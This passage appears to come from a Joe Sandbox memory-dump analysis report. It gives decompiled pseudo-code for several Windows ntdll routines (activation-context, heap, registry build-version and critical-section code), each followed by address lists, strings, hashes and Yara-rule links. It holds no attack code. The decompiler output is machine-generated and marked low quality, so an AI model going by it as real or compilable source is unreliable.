						if(_t96 == 0xfffffffc) {
							L24:
							_t57 = _t141 + 0x200; // 0x230
							_t131 = _t57;
							_t104 =  *_t131;
							_t58 = _t141 + 0x204; // 0x234
							_t147 = _t58;
							_v536 = _t131;
							_v544 = _t147;
							if(_t104 == 0) {
								L33:
								_t105 =  *_t147;
								L34:
								_t141 = _v556;
								 *_v556 = _t105;
								 *_v560 =  *_t131;
								_t107 = _v564;
								if(_t107 != 0) {
									 *_t107 = _t142;
								}
								_t148 = 0;
								L37:
								if(_t128 != 0 && _t128 !=  &_v532) {
									L34E63B90( &_v552);
								}
								goto L39;
							}
							_t142 =  *((intOrPtr*)(_t104 + 0x18)) + _t104;
							L26:
							_t141 = 0;
							if( *_t131 != 0 &&  *_t147 == 0) {
								_t108 =  *(_t142 + 8);
								if( *(_t142 + 8) > 0x3ffffffc) {
									_t148 = 0xc0000095;
									goto L37;
								}
								_t129 = E34E65D90(_t131,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc + _t108 * 4);
								if(_t129 == 0) {
									_t148 = 0xc0000017;
									L51:
									_t128 = _v548;
									goto L37;
								}
								_t141 =  *(_t142 + 8);
								_t67 = _t129 + 0xc; // 0xc
								_t113 = E34E833D0(_t129,  *(_t142 + 8), _t67);
								_t148 = _t113;
								if(_t113 < 0) {
									L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
									goto L51;
								}
								_t147 = _v544;
								asm("lock cmpxchg [esi], ecx");
								if(0 != 0) {
									E34E49303(_t129);
									L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t129);
								}
								_t131 = _v536;
								_t128 = _v548;
							}
							goto L33;
						}
						if((_v540 & 0x00000003) != 0) {
							goto L12;
						}
						_t55 = _t96 + 0x10; // 0x10
						_t131 = _t55;
						_t141 =  *_t131;
						if(_t141 == 0) {
							_t148 = 0xc00000e5;
							goto L39;
						}
						_t142 =  *((intOrPtr*)(_t141 + 0x18)) + _t141;
						_t105 = _t96 + 0x5c;
						goto L34;
					}
					L12:
					if(_t96 == 0xfffffffc || (_v540 & 0x00000002) != 0) {
						goto L24;
					} else {
						if(_t96 != 0) {
							if((_v540 & 0x00000001) == 0) {
								goto L26;
							}
						}
						_t31 = _t141 + 0x1f8; // 0x228
						_t131 = _t31;
						_t119 =  *_t131;
						_t32 = _t141 + 0x1fc; // 0x22c
						_t147 = _t32;
						_v536 = _t131;
						_v544 = _t147;
						if(_t119 == 0) {
							goto L33;
						}
						_t142 =  *((intOrPtr*)(_t119 + 0x18)) + _t119;
						_v568 = _t142;
						if( *_t147 != 0) {
							goto L26;
						}
						_t120 =  *((intOrPtr*)(_t141 + 0x10));
						_t141 = 0x208;
						_t139 =  *(_t120 + 0x38);
						_t142 =  *(_t120 + 0x3c);
						_t149 = _t139 & 0x0000ffff;
						_v540 = _t139;
						_t41 = _t149 + 0xe; // 0x23a
						_t121 = _t41;
						if(_t121 > 0x208) {
							if(_t121 <= 0xfffe) {
								_v550 = _t139 + 0xe;
								_t128 = E34E65D60(_t139 + 0x0000000e & 0x0000ffff);
								_v548 = _t128;
								if(_t128 != 0) {
									L19:
									E34E988C0(_t128, _t142, _t149);
									_t131 = _v536;
									_v552 = _v540 + 0xc;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_t142 = _v568;
									_t147 = _v544;
									goto L26;
								}
								_t148 = 0xc0000017;
								goto L39;
							}
							_t148 = 0xc0000106;
							goto L39;
						}
						_t128 =  &_v532;
						_v550 = 0x208;
						_v548 = _t128;
						goto L19;
					}
				}
			}

0x34e8265c
0x34e8266e
0x34e82675
0x34e8267b
0x34e82685
0x34e8268b
0x34e82691
0x34e82697
0x34e8269b
0x34e826a1
0x34e826a8
0x34e826aa
0x34e826b3
0x34e826b4
0x34e826bb
0x34e826be
0x34e826c4
0x34e826ca
0x34e826d5
0x34ec1ff1
0x34ec1ff9
0x34e82906
0x34e82916
0x34e82916
0x34e826e1
0x34e826e9
0x34e826eb
0x34e826eb
0x34e826f3
0x34e826fb
0x34e826fd
0x34e826fd
0x34e82705
0x34e8270d
0x34e8270f
0x34e8270f
0x34e8271b
0x34ec20a8
0x34ec20ae
0x34ec20b4
0x34ec20b5
0x34ec20c9
0x34ec20d1
0x00000000
0x34e82741
0x34e82743
0x34e82813
0x34e8283c
0x34e8283c
0x34e8283c
0x34e82842
0x34e82844
0x34e82844
0x34e8284a
0x34e82850
0x34e82858
0x34e828d2
0x34e828d2
0x34e828d4
0x34e828d4
0x34e828da
0x34e828e4
0x34e828e6
0x34e828ee
0x34e828f0
0x34e828f0
0x34e828f2
0x34e828f4
0x34e828f6
0x34ec20e2
0x34ec20e2
0x00000000
0x34e828f6
0x34e8285d
0x34e8285f
0x34e8285f
0x34e82863
0x34e82869
0x34e82871
0x34ec205d
0x00000000
0x34ec205d
0x34e8288e
0x34e82892
0x34ec2067
0x34ec2080
0x34ec2080
0x00000000
0x34ec2080
0x34e82898
0x34e8289b
0x34e828a1
0x34e828a6
0x34e828aa
0x34ec207b
0x00000000
0x34ec207b
0x34e828b0
0x34e828ba
0x34e828c0
0x34ec208d
0x34ec209e
0x34ec209e
0x34e828c6
0x34e828cc
0x34e828cc
0x00000000
0x34e82863
0x34e8281c
0x00000000
0x00000000
0x34e82822
0x34e82822
0x34e82825
0x34e82829
0x34ec2003
0x00000000
0x34ec2003
0x34e82832
0x34e82834
0x00000000
0x34e82834
0x34e82749
0x34e8274c
0x00000000
0x34e8275f
0x34e82761
0x34ec2014
0x00000000
0x00000000
0x34ec201a
0x34e82767
0x34e82767
0x34e8276d
0x34e8276f
0x34e8276f
0x34e82775
0x34e8277b
0x34e82783
0x00000000
0x00000000
0x34e8278c
0x34e82791
0x34e82797
0x00000000
0x00000000
0x34e8279d
0x34e827a0
0x34e827a5
0x34e827a8
0x34e827ab
0x34e827ae
0x34e827b4
0x34e827b4
0x34e827b9
0x34ec2024
0x34ec2033
0x34ec2043
0x34ec2045
0x34ec204d
0x34e827d2
0x34e827d5
0x34e827e8
0x34e827ee
0x34e827fd
0x34e827fe
0x34e827ff
0x34e82800
0x34e82802
0x34e82808
0x00000000
0x34e82808
0x34ec2053
0x00000000
0x34ec2053
0x34ec2026
0x00000000
0x34ec2026
0x34e827bf
0x34e827c5
0x34e827cc
0x00000000
0x34e827cc
0x34e8274c

Strings

.Local, xrefs: 34E827F8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 34EC1FE3, 34EC20BB
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 34EC20C0
SXS: %s() passed the empty activation context, xrefs: 34EC1FE8

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 0d7e3d31215983444c4cb86934f93c10eb022defd047f7afe74bc828d01b4028
Instruction ID: 78403d88f42ae73c1b665ebf98c230d67b177a06de595c92a155dc638b70739e
Opcode Fuzzy Hash: 0d7e3d31215983444c4cb86934f93c10eb022defd047f7afe74bc828d01b4028
Instruction Fuzzy Hash: 4FA16A75A0132D9BEF24CF64D884B99B3B5BF58758F1041EAD808AB291D7309E85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34E4F5C7 Relevance: 5.2, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E34E4F5C7(void* __ecx, void* __edx) {
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				void* __ebx;
				intOrPtr _t63;
				void* _t66;
				signed int _t73;
				void* _t77;
				void* _t78;
				signed char* _t81;
				intOrPtr _t82;
				signed char* _t87;
				intOrPtr _t88;
				void* _t89;
				signed char* _t92;
				signed char _t98;
				void* _t110;
				void* _t130;
				void* _t136;
				signed int _t138;
				void* _t140;

				_t140 = (_t138 & 0xfffffff8) - 0x24;
				_t110 = __edx;
				_t136 = __ecx;
				E34E4F858(__edx,  &_v36,  &_v40);
				if(E34E868EA( *((intOrPtr*)(_t136 + 0x1f8)) -  *((intOrPtr*)(_t136 + 0x244)), _t136, _t136 + 0xd4) == 0) {
					_t128 = 0xc000012d;
					L17:
					_t63 =  *[fs:0x30];
					 *((intOrPtr*)(_t136 + 0x228)) =  *((intOrPtr*)(_t136 + 0x228)) + 1;
					__eflags =  *(_t63 + 0xc);
					if( *(_t63 + 0xc) == 0) {
						_push("HEAP: ");
						E34E4B910();
					} else {
						E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_v40);
					_push(_v36);
					_push(_t136);
					E34E4B910("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t128);
					_t66 = 0;
					L15:
					return _t66;
				}
				if(( *(_t136 + 0x40) & 0x00040000) != 0) {
					_t130 = 0x40;
					_push(0);
					_push(0x1c);
					_push(_t140 + 0x1c);
					_push(3);
					_push(_t136);
					_push(0xffffffff);
					_t73 = L34E92BE0();
					__eflags = _t73;
					if(_t73 < 0) {
						L22:
						E34F15FED(0, _t136, 1,  *((intOrPtr*)(_t140 + 0x20)), 0, 0);
						goto L2;
					}
					__eflags =  *(_t140 + 0x18) & 0x00000060;
					if(( *(_t140 + 0x18) & 0x00000060) == 0) {
						goto L22;
					}
					__eflags =  *((intOrPtr*)(_t140 + 0x14)) - _t136;
					if( *((intOrPtr*)(_t140 + 0x14)) == _t136) {
						L3:
						_push(_t130);
						_push("true");
						_push( &_v40);
						_push(0);
						_push( &_v36);
						_push(0xffffffff);
						_t77 = E34E92B10();
						_t128 = _t77;
						if(_t77 < 0) {
							goto L17;
						}
						_t78 = E34E63C40();
						_t131 = 0x7ffe0380;
						if(_t78 != 0) {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t81 = 0x7ffe0380;
						}
						if( *_t81 != 0) {
							_t82 =  *[fs:0x30];
							__eflags =  *(_t82 + 0x240) & 0x00000001;
							if(( *(_t82 + 0x240) & 0x00000001) != 0) {
								E34F0EFD3(_t110, _t136, _v36, _v40, 8);
							}
						}
						 *((intOrPtr*)(_t136 + 0x240)) =  *((intOrPtr*)(_t136 + 0x240)) - 1;
						 *((intOrPtr*)(_t136 + 0x244)) =  *((intOrPtr*)(_t136 + 0x244)) - _v40;
						if(E34E63C40() != 0) {
							_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t87 = _t131;
						}
						if( *_t87 != 0) {
							_t88 =  *[fs:0x30];
							__eflags =  *(_t88 + 0x240) & 0x00000001;
							if(( *(_t88 + 0x240) & 0x00000001) != 0) {
								__eflags = E34E63C40();
								if(__eflags != 0) {
									_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								E34F0F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t131 & 0x000000ff);
							}
						}
						_t89 = E34E63C40();
						_t132 = 0x7ffe038a;
						if(_t89 != 0) {
							_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t92 = 0x7ffe038a;
						}
						if( *_t92 != 0) {
							__eflags = E34E63C40();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							}
							E34F0F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t132 & 0x000000ff);
						}
						 *((intOrPtr*)(_t136 + 0x21c)) =  *((intOrPtr*)(_t136 + 0x21c)) + 1;
						_t98 =  *(_t110 + 2);
						if((_t98 & 0x00000004) != 0) {
							E34EA8140(_v36, _v40, 0xfeeefeee);
							_t98 =  *(_t110 + 2);
						}
						 *(_t110 + 2) = _t98 & 0x00000017;
						_t66 = 1;
						goto L15;
					}
					goto L22;
				}
				L2:
				_t130 = 4;
				goto L3;
			}

0x34e4f5cf
0x34e4f5d9
0x34e4f5e0
0x34e4f5e3
0x34e4f607
0x34eae162
0x34eae167
0x34eae167
0x34eae16d
0x34eae173
0x34eae177
0x34eae2dd
0x34eae2e2
0x34eae17d
0x34eae192
0x34eae197
0x34eae2e8
0x34eae2ec
0x34eae2f0
0x34eae2f7
0x34eae2ff
0x34e4f6ba
0x34e4f6c0
0x34e4f6c0
0x34e4f614
0x34eae19f
0x34eae1a0
0x34eae1a2
0x34eae1a8
0x34eae1a9
0x34eae1ab
0x34eae1ac
0x34eae1ae
0x34eae1b3
0x34eae1b5
0x34eae1c8
0x34eae1d6
0x00000000
0x34eae1d6
0x34eae1b7
0x34eae1bc
0x00000000
0x00000000
0x34eae1be
0x34eae1c2
0x34e4f61d
0x34e4f61d
0x34e4f61e
0x34e4f627
0x34e4f628
0x34e4f62e
0x34e4f62f
0x34e4f631
0x34e4f636
0x34e4f63a
0x00000000
0x00000000
0x34e4f640
0x34e4f645
0x34e4f64c
0x34eae1e9
0x34e4f652
0x34e4f652
0x34e4f652
0x34e4f657
0x34eae1f3
0x34eae1f9
0x34eae200
0x34eae212
0x34eae212
0x34eae200
0x34e4f661
0x34e4f667
0x34e4f674
0x34eae225
0x34e4f67a
0x34e4f67a
0x34e4f67a
0x34e4f67f
0x34eae22f
0x34eae235
0x34eae23c
0x34eae247
0x34eae249
0x34eae254
0x34eae254
0x34eae254
0x34eae26f
0x34eae26f
0x34eae23c
0x34e4f685
0x34e4f68a
0x34e4f691
0x34eae282
0x34e4f697
0x34e4f697
0x34e4f697
0x34e4f69c
0x34eae291
0x34eae293
0x34eae29e
0x34eae29e
0x34eae29e
0x34eae2b9
0x34eae2b9
0x34e4f6a2
0x34e4f6a8
0x34e4f6ad
0x34eae2d0
0x34eae2d5
0x34eae2d5
0x34e4f6b5
0x34e4f6b8
0x00000000
0x34e4f6b8
0x00000000
0x34eae1c2
0x34e4f61a
0x34e4f61c
0x00000000

Strings

HEAP: , xrefs: 34EAE2DD
HEAP[%wZ]: , xrefs: 34EAE18D
`, xrefs: 34EAE1B7
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 34EAE2F2

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 247f16332f4e996c8b85598911e9b0aaf77de36738dafde8812b7391ba5c3fef
Instruction ID: dd63113aad25d2266695c2e8e47d2b21742e6538f703269c3e0c161b91d5a564
Opcode Fuzzy Hash: 247f16332f4e996c8b85598911e9b0aaf77de36738dafde8812b7391ba5c3fef
Instruction Fuzzy Hash: BC61E375644790EFF311CB68D944F67B7E9EF84B58F040999F9648B291D734E800CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 34E490F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 34EAB83C, 34EAB879
HEAP[%wZ]: , xrefs: 34EAB82F, 34EAB86C
VirtualQuery Failed 0x%p %x, xrefs: 34EAB886
VirtualProtect Failed 0x%p %x, xrefs: 34EAB849

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: 39cfaef406460517769c1e4167d6709feb2fb2c2a08937a43da79c203c3ab13e
Instruction ID: ad8a65cb522c1442c81a762661c0ece2d28e1e7fdf008912ea327b7f18921619
Opcode Fuzzy Hash: 39cfaef406460517769c1e4167d6709feb2fb2c2a08937a43da79c203c3ab13e
Instruction Fuzzy Hash: 4631E136A10214FFEB01DBA9EC84F9AB7B8EF447A0F1545A5E914AB391D730E940CE61

Uniqueness

Uniqueness Score: -1.00%

Function 34E91190 Relevance: 5.1, Strings: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E34E91190(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				signed int _t38;
				signed int _t39;
				void* _t55;
				void* _t61;
				void* _t62;
				signed int _t63;
				void* _t65;
				signed int _t70;

				_t55 = __edx;
				E34E95050(__ecx,  &_v20, __ecx);
				_v52 = 0x18;
				_v44 =  &_v20;
				_v48 = 0;
				_push( &_v52);
				_push(0x20019);
				_v40 = 0x40;
				_push( &_v12);
				_v36 = 0;
				_v32 = 0;
				_t62 = E34E92AB0();
				if(_t62 < 0) {
					L9:
					return _t62;
				}
				_t38 = _a8;
				_t63 = 2;
				_t39 = _t38 * _t63;
				_t70 = _t38 * _t63 >> 0x20;
				if(_t70 < 0 || _t70 <= 0 && _t39 <= 0xffffffff) {
					_v8 = _t39;
					_push( &_v8);
					_t61 = 0xc;
					_t58 = _t39;
					if(E34E8457E(_t39, _t61) < 0) {
						goto L13;
					}
					_t65 = E34E65D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
					if(_t65 == 0) {
						_t62 = 0xc0000017;
					} else {
						_t20 =  &_v28; // 0x34e8e065
						E34E95050(_t58, _t20, _t55);
						_push( &_a8);
						_push(_v8);
						_t23 =  &_v28; // 0x34e8e065
						_push(_t65);
						_push(_t63);
						_push(_v12);
						_t62 = L34E92B00();
						if(_t62 >= 0) {
							_t28 = _t65 + 0xc; // 0xc
							E34E988C0(_a4, _t28,  *((intOrPtr*)(_t65 + 8)));
						}
						L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
					}
					_push(_v12);
					E34E92A80();
					goto L9;
				} else {
					L13:
					_push(_v12);
					E34E92A80();
					return 0xc0000095;
				}
			}

0x34e9119f
0x34e911a2
0x34e911aa
0x34e911b1
0x34e911b9
0x34e911bc
0x34e911bd
0x34e911c5
0x34e911cc
0x34e911cd
0x34e911d0
0x34e911d8
0x34e911dc
0x34e9126d
0x00000000
0x34e9126d
0x34e911e2
0x34e911e7
0x34e911e8
0x34e911ea
0x34e911ec
0x34e91200
0x34e91203
0x34e91206
0x34e91207
0x34e91210
0x00000000
0x00000000
0x34e91229
0x34e9122d
0x34e9128a
0x34e9122f
0x34e91230
0x34e91234
0x34e9123c
0x34e9123d
0x34e91240
0x34e91243
0x34e91244
0x34e91246
0x34e9124e
0x34e91252
0x34e91279
0x34e91280
0x34e91285
0x34e91260
0x34e91260
0x34e91265
0x34e91268
0x00000000
0x34ec9a99
0x34ec9a99
0x34ec9a99
0x34ec9a9c
0x00000000
0x34ec9aa1

Strings

e4, xrefs: 34E91230, 34E91240, 34E91233, 34E91245
BuildLabEx, xrefs: 34E9122F
@, xrefs: 34E911C5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 34E9119B

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e4
API String ID: 0-3910275484
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: 2cf894dc3538642d53cb326b2aaa5c02d4dd218fc51ba2c79e75f9ed76deff23
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: BE318176910219FFEF11DB95CC44EDEBBBDEB84754F004425E514A72A0E738DE059B90

Uniqueness

Uniqueness Score: -1.00%

Function 34ED166E Relevance: 5.1, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E34ED166E(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t19;
				void* _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t38;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;

				_t44 = __ecx;
				_t30 = 0;
				_v16 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x54)) +  *((intOrPtr*)( *[fs:0x30] + 8)) + 0xffffffd4;
				_t19 = E34E99EB0(_t42, "BoG_ *90.0&!!  Yy>", 0x13);
				_t48 = _t47 + 0xc;
				if(_t19 != 0 ||  *((intOrPtr*)(_t42 + 0x20)) > 3) {
					_t43 = 1;
					_v8 = 1;
					_t46 = _t44 + 0x18 + ( *(_t44 + 0x14) & 0x0000ffff);
					_v12 = _t30;
					if(0 <  *(_v16 + 6)) {
						while(1) {
							_t23 = E34E99EB0(_t46, "stxt371", 9);
							_t48 = _t48 + 0xc;
							if(_t23 == 0) {
								goto L12;
							}
							if(_t43 != 0) {
								_t29 = E34E99EB0(_t46, ".txt", 6);
								_t48 = _t48 + 0xc;
								_t43 = _t29;
							}
							_t26 = _v8;
							if(_t26 != 0) {
								_t26 = E34E99EB0(_t46, ".txt2", 7);
								_t48 = _t48 + 0xc;
								_v8 = _t26;
							}
							if(_t43 != 0 || _t26 != 0) {
								_t46 = _t46 + 0x28;
								_t38 = _v12 + 1;
								_v12 = _t38;
								if(_t38 < ( *(_v16 + 6) & 0x0000ffff)) {
									continue;
								} else {
								}
							} else {
								goto L12;
							}
							goto L13;
						}
						goto L12;
					}
				} else {
					L12:
					_t30 = 1;
					 *( *[fs:0x30] + 3) =  *( *[fs:0x30] + 3) | 0x00000008;
				}
				L13:
				return _t30;
			}

0x34ed167e
0x34ed1680
0x34ed1689
0x34ed1691
0x34ed1699
0x34ed16a0
0x34ed16a6
0x34ed16b2
0x34ed16b7
0x34ed16ba
0x34ed16bc
0x34ed16c8
0x34ed16ca
0x34ed16d2
0x34ed16d7
0x34ed16dc
0x00000000
0x00000000
0x34ed16e0
0x34ed16ea
0x34ed16ef
0x34ed16f2
0x34ed16f2
0x34ed16f4
0x34ed16f9
0x34ed1703
0x34ed1708
0x34ed170b
0x34ed170b
0x34ed1710
0x34ed1719
0x34ed171f
0x34ed1720
0x34ed1729
0x00000000
0x00000000
0x34ed172b
0x00000000
0x00000000
0x00000000
0x00000000
0x34ed1710
0x00000000
0x34ed16ca
0x34ed172d
0x34ed172d
0x34ed1733
0x34ed1741
0x34ed1741
0x34ed1746
0x34ed174a

Strings

.txt2, xrefs: 34ED16FD
BoG_ *90.0&!! Yy>, xrefs: 34ED1693
stxt371, xrefs: 34ED16CC
.txt, xrefs: 34ED16E4

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
API String ID: 0-1880532218
Opcode ID: 475f9e04f4c671076ac2fd2bfb57eb79f38553986da37883a8f04fee76ea31fc
Instruction ID: 0654c28c794e8f138cb107da0d125ade8ef7b180b3926f620a4a1dfa19642773
Opcode Fuzzy Hash: 475f9e04f4c671076ac2fd2bfb57eb79f38553986da37883a8f04fee76ea31fc
Instruction Fuzzy Hash: C921337EA02200AFD7058B59DD41BDAF3F5AF46748F08406EE805A7381EB78DD02CB41

Uniqueness

Uniqueness Score: -1.00%

Function 34E57072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34EB15E0
RtlDebugPrintTimes.NTDLL ref: 34EB15F5

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2adb9b61a3372604a05bd99356bf474dc4f1a699dcc23d143a7d4669fc1a6aed
Instruction ID: f5d69c8a0e05cd402065496a24d88cb445b93f9e603b742be338746530a98eaf
Opcode Fuzzy Hash: 2adb9b61a3372604a05bd99356bf474dc4f1a699dcc23d143a7d4669fc1a6aed
Instruction Fuzzy Hash: A751E038E04605EFEB05DBA4C844BAEF7B4FF443A9F1081A9E502972A0DB74D921DB80

Uniqueness

Uniqueness Score: -1.00%

Function 34EE3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

PE, xrefs: 34EE37D2
LdrpResSearchResourceHandle Exit, xrefs: 34EE3681
LdrpResSearchResourceHandle Enter, xrefs: 34EE3666

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: 33dfaf0dd9f6da925960dabe1e20862217708cd9331e8b91fbf0051354b79a85
Instruction ID: 3d436fdca17ce0a661cf0748b810e2e85928d936ee2f83c8fb2351697a2d0703
Opcode Fuzzy Hash: 33dfaf0dd9f6da925960dabe1e20862217708cd9331e8b91fbf0051354b79a85
Instruction Fuzzy Hash: E6F17EB5A00228CBDB21CF14CC80BA9B3B5EF44754F5490EAE609A7641EB359EC5CF59

Uniqueness

Uniqueness Score: -1.00%

Function 34E7F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 34EC00C7
RTL: Re-Waiting, xrefs: 34EC0128
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 34EC00F1

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 91048ce273b3ac891ff8cbcc447e27cb03a3748c81ee7f7e6f338382f0106fba
Instruction ID: b4b4eef9abf18f1bbca4ec6945513036870567ed571ba1d9ce31b4b6d961f1ea
Opcode Fuzzy Hash: 91048ce273b3ac891ff8cbcc447e27cb03a3748c81ee7f7e6f338382f0106fba
Instruction Fuzzy Hash: B5E1BD74608741DFE711CF68C980B1ABBE5BF88368F100A5DF5A58B2E1DB74E945CB82

Uniqueness

Uniqueness Score: -1.00%

